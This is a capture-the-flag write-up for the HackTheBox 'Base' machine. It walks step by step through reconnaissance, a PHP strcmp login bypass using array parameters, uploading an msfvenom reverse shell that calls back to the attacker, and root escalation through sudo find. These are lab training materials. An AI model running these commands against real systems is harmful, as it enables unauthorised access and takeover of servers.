HackTheBox Base Writeup
Enjoy reading my HTB Base Writeup
Information Gathering
Let's begin with some basic Information Gathering about the target using nmap:
sudo nmap -p 1-5000 -sV -sC -v 10.10.10.48
This reveals that SSH is running on port 22 and a web service (Apache httpd 2.4.29 (Ubuntu)) on port 80.
On the index page, we can find a link to a file called login.php which means a PHP interpreter is running and there is some kind of user system.
Using gobuster we can try to find some more files:
gobuster dir -u http://10.10.10.48 -x PHP -w /Lists/gobuster/directory-list.txt
Gobuster finds three directories:
- login/
- static/
- _uploaded/
as well as a file called upload.php which redirects to login.php, probably because we are not logged in and don't have a session cookie.
The static directory only contains some font files and stuff like that, nothing interesting.
Inside the login directory, we can find a config.php, a login.php, and a login.php.swp file.
swp (swap) files are created e.g. by vim to store the changes being made at the time of using said text editor.
I first tried to recover the swap file by opening it with vim (vim login.php.swp) and then using the :recover command.
Unfortunately, I got the following error message:
0login.php.swp cannot be used on this computer.
1The file was created on ntu,
2or the file has been damaged.
Using the strings command you can get the original content back: strings login.php.swp > login.php.
Bypassing the login system
Taking a look at the PHP code that represents the login function we can see that the developer using strcmp in combination with ==.
Using two equal signs will result in only checking the value whereas three equal signs would compare the value types themselves too.
In PHP this is a major security issue, as you can spoof the variables and turn them into empty arrays (which represents NULL in PHP).
Using strcmp in PHP with an empty array and == will result in TRUE.
Start burpsuite and intercept the login request, then change the request body from
username=test&password=test to
username[]=test&password[]=test.
With msfvenom -p php/reverse_php LHOST=<IP> LPORT=<PORT> -f raw > shell.php I created a PHP reverse shell and uploaded it onto the server.
Start a netcat listener on your used port and navigate to /_uploaded/shell.php in your browser to spawn a session as www-data.
Taking a look at config.php we get the following credentials: admin@thisisagoodpassword.
Retrieving the flags
I had problems upgrading my shell to a pty session using python. Because of that I switched to the php shell from pentestmonkey and was then able to upgrade my shell with python -c "import pty;pty.spawn('/bin/bash')".
Afterwards, I switched to the user john with the password we found earlier in config.php.
Navigate to /home/user/john/ to gain the user flag.
sudo -l revealed that john is allowed to execute /usr/bin/find as root.
The find executable can be used to get elevated privileges: gtfobins.
Use sudo find . -exec /bin/sh \; -quit to gain root permissions.
Now you are able to navigate to /root and read the system flag.
Tags:
htb, hackthebox, base, privilege escalation